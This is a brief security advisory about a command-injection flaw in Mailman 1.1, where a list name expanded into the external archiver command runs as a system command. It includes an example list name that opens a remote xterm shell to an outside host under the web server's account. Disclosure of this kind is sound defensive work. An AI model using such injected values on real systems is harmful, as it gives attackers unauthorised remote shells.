Mailman 1.1 Writable Variable Vulnerability
Mailman supports external archiving of messages, typically via an archiver like MHonArc or hypermail. Macros may be used which are based on variables internal to Mailman.
For example, list archives can be saved on a per-list basis with the following entry in $prefix/Mailman/mm_cfg.py, :
PUBLIC_EXTERNAL_ARCHIVER = '(mhonarc -add -nolock -umask 023 -rcfile rc.%(listname)s -outdir /mnt/WWW/htdocs/lists/%(listname)s)'
The (listname) value can be created for each list by the list administrator.
If the listname variable is set to a system command, the command will be run every time a message is sent to the list as Mailman archives the message.
For example, if the listname value is set to: `/usr/X11R6/bin/xterm -display myhost.example.com:0 -e /bin/csh`
Upon receipt of a message to the list, the embedded command will be executed, in this example opening a remote xterm with a shell running under the uid/gid of the Web server.
Other variable names may also be accessed, depending on the configuration of your PUBLIC_EXTERNAL_ARCHIVER definition.
The patch supplied under the Solution tab will only fix problems with %(listname)s expansion.